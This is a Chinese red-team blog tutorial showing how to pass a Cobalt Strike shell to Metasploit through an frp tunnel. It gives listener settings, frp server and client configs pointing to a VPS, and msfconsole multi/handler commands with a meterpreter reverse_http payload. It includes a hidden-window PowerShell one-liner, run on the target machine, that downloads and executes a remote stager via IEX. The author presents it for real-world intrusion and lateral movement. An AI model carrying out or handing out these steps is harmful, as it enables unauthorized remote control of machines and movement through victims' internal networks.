利用frp将cs的shell派生到msf

msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生到msf,满足内网渗透中的需求。

第一步:

首先我们连上cs后,我们需要去监听器修改参数。

利用frp将cs的shell派生到msf

我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。

利用frp将cs的shell派生到msf

第二步:

在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用方式以及命令不做介绍,需要了解百度即可。这里我们去修改frp.ini里面信息:vim frp.ini 端口随意,我们这里配置为7222端口。

利用frp将cs的shell派生到msf

我们启动它即可:./frps -c frps.ini

利用frp将cs的shell派生到msf

接下来我们去kali中去配置Frp客户端的frpc.ini文件,如下图配置

[common]
server_addr = 11.11.11.11(VPS地址)
server_port = 7222

[msf]
type = tcp
local_ip=127.0.0.1
local_port=1234
remote_port =1080

利用frp将cs的shell派生到msf

此时我们在kali中启动客户端

./frpc -c frpc.ini

利用frp将cs的shell派生到msf

第三步:

为了更方便演示本文要表达的重点,我们这就直接powershell上线为大家演示派生到msf的步骤。

利用frp将cs的shell派生到msf

利用frp将cs的shell派生到msf

直接生成powershell,去目标机器执行上线。

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.11.111:80/a’))”

利用frp将cs的shell派生到msf

第四步:

上线以后,我们就可以选择性看自己是否在内网渗透中,需要msf的帮助,然后可以利用FRP将cs的shell派生到msf中,实现联动了。

我们去kali启动msf,并做相应配置

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http //这里一定要用http
set LHOST 127.0.0.1 //这里是监听本地地址即可
set LPORT 1234 //端口需要跟前面frp配置的端口对应
run

set LPORT 1234这一块对应的端口就是前面配置frp时候的local_port=1234

利用frp将cs的shell派生到msf

然后我们就可以在msf中 run一下了

利用frp将cs的shell派生到msf

此时我们点击cs中的增加会话,当然我这里是中文的cs,英文原版中对应的是spawn

利用frp将cs的shell派生到msf

我们choose我们配置好的监听器选中点击即可

利用frp将cs的shell派生到msf

此时回到msf,稍微等一会meterpreter 就来了。

利用frp将cs的shell派生到msf

好了,现在就实现了cs的shell派生到msf上。可以愉快的通过msf横向了。

参考:

https://mp.weixin.qq.com/s/D_z4kmY2qvE6rw1yed-ZLg

总结:

1.为什么不多介绍一个msf派生到cs的方式?

因为实战中,渗透师傅们更喜欢用cs来操作,界面友好,所以本着一切以实际的攻防实战经验为主,故不介绍msf派生到cs的方式。

2.派生shell的方式不止一种,这里向大家演示的是本人平时最喜欢用的一种,也是个人认为最简单易懂的方式,总而言之,内网渗透的本质就是对机器的信息收集,所以要在转换攻击思路与方式中,也要注重收集时候的动静。

3.只会敲一些干货给大家,写作不易,喜欢转载加收藏即可,希望可以帮助大家在实战中应用起来。

欢迎大家关注个人公众号,本人致力于红队安全攻防的研究,每日分享技术干货,绝不水文,愿对你有所帮助!
利用frp将cs的shell派生到msf

上一篇:345. 反转字符串中的元音字母(LeetCode)


下一篇:听说你还不会UAF?